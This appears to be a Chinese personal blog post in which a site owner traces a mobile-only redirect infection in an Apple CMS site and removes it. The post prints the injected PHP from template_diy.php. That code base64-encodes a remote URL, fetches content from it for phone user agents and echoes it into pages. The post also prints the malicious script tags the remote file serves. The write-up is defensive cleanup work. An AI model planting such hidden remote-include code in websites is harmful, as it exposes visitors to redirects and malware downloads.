请在Chrome、Firefox等现代浏览器浏览本站。网站域名:森林之家(www.foresthouse.cn)爱学习、爱分享、爱绿软、爱恐怖、爱音乐、爱唠叨、爱折腾、爱生活!

记一次苹果CMS被挂马清除

我要吐嘈 forest 94℃ 已收录 0评论

今天闲来无事用手机访问了我的一个小站发现打开以后会跳转多次然后到达另一个网站并弹出窗口提示下载某APP,并且关掉以后还会自行下载,接着提示是否安装,如果我不理它返回网页会返回到很多个诱导类的垃圾网站上面并且提示安装病毒软件,太无耻了典型的借刀杀人杀得痛快。用户最后把这烂帐都会算在站长头上算在网站头上造成了非常大的浏览体验最终导致用户对此网站避而远之。

苹果CMS木马
首先把网站数据打包下载到本地在模板中查看相关代码一切正常;

然后找了某工具护卫神查询相关信息后依然无果,DW搜索相关链接无果;

然后模板和所有文件中都找不到只有这几种可能了,一是把木马放数据库里了,二是木马被编码或加密了,三就可怕了留了一个加密链接到它的服务器可以自己YY了。很不幸我就是第三种。

接着在数据库里也没找到啥异常,然后把根目录的index.php复制一份改为index1.php然后访问它慢慢删除里面的代码看前台的变化,直到把”require(‘inc/conn.php’);”删除以后暗链不见了,于是把conn.php复制一份改名为conn1.php,并把index1.php中的”require(‘inc/conn.php’);”改为”require(‘inc/conn1.php’);”再慢慢删除conn1.php里面的代码看前台的变化,直到把”require(MAC_ROOT.”/inc/common/template_diy.php”);”删除以后暗链不见了,那么罪魁祸首就是template_diy.php文件了,打开它以后代码如下:

<?php
function replaceTplCustom()
{	global $db,$tpl;
}
$arr = array('Android','android','Linux','iPhone','iPad','iPod','ios');
for($i=0;$i<count($arr);$i++){	if (@ereg($arr[$i], $_SERVER["HTTP_USER_AGENT"])) {	$file = file_get_contents((base64_decode(aHR0cDovL3dpZHRoLmRvd25sb2FkLzQudHh0)));	echo $file;	}
}

这是苹果CMS预留的一个二次开发接口,把6到12行删除以后就正常了。这么做只是治标不治本,它可能还会再给你增加这段木马于是把程序升级一下再静观其变吧。

上面的代码只有判断是手机、pad或linux系统时才会触发,所以在电脑上访问网站一切正常。代码被加密了解出来以后重要的一行是“http://width.download/4.txt”访问它会出现如下代码第一段不用说是统计访问量的第二段就是链接到它服务器的暗链,这个人最少已经干了2年零6个月了,服务器在香港,IP是193.8.80.175,域名在新网注册。

<script type="text/javascript" src="https://js.users.51.la/20059093.js"></script>
<script type="text/javascript" src="https://www.baidujavascript.com/2.js"></script>
SO,到此结束!
本站文章如未注明,均为原创丨本网站采用BY-NC-SA协议进行授权,转载请注明转自:https://www.foresthouse.cn/archives/6230.html
喜欢 (1)or分享 (0)
发表我的评论(注:在您评论完以后不会立即显示,请不要重复刷新以免进入黑名单。)
取消评论
表情 代码 贴图 加粗 链接 私信 删除线 签到

Hi,请填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址